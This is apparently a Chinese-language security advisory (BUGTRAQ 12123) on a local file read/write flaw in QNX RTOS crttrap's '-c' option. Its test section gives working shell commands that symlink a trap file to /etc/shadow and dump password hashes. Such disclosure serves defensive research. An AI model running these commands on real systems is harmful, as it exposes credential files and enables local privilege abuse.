发布日期：2004-12-29
更新日期：2004-12-30

受影响系统：

QNX RTOS 6.2.0 Update Patch A
QNX RTOS 6.2.0
QNX RTOS 6.1.0
QNX RTOS 4.25
QNX RTOS 2.4

描述：

---

BUGTRAQ  ID: 12123

QNX RTOS是一款设计用于嵌入系统的实时操作系统。

QNX crrtrap在处理'-c'参数时存在问题，本地攻击者可以利用这个漏洞读/写任意文件。

crrtrap用于检查显卡硬件，启动正确的驱动，crrtrap '-c'标记指定那个trap文件会被写，组合'trap'标记可能写硬盘上任意文件。

默认crttrap读写"/etc/system/config"中的trap文件，其中对目录进行了写限制，并过滤"../"，不过由于没有检查"/"可导致绕过保护，通过建立子目录获得读/写权限，并操作我们自己的trap文件。这样可以利用此问题读/写系统的任意文件。

<*来源：Julio Cesar Fort （julio@rfdslabs.com.br）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=110434382928609&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Julio Cesar Fort （julio@rfdslabs.com.br）提供了如下测试方法：

$ crttrap -c tmp/rfdslabs trap
/usr/photon/bin/devgt-iographics -dldevg-svga.so -I0 -d0x5333, 0x8c12
/usr/photon/bin/devgt-iographics -dldevg-vesabios.so -I0 -d0x5333, 0x8c12
crttrap: wrote config file as /etc/system/config/tmp/rfdslabs
$ cd /etc/system/config/tmp
$ ls -la
total 52
drwxrwxr-x    2 root 100         2048 Dec 11 12:40 .
drwxrwxr-x    3 root root        2048 Dec 11 12:35 ..
-rw-r--r--    1 root 100        21671 Dec 11 12:40 rfdslabs

$ rm -f rfdslabs
$ ln -s /etc/shadow rfdslabs
$ crttrap -c tmp/rfdslabs dump
root:21QjUKxP9gEJK:0:0:0
sandimas:91UzHxvt3x1n2:0:0:0

建议：

---

厂商补丁：

QNX
---
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.qnx.com/

浏览次数：2597
严重程度：1（网友投票）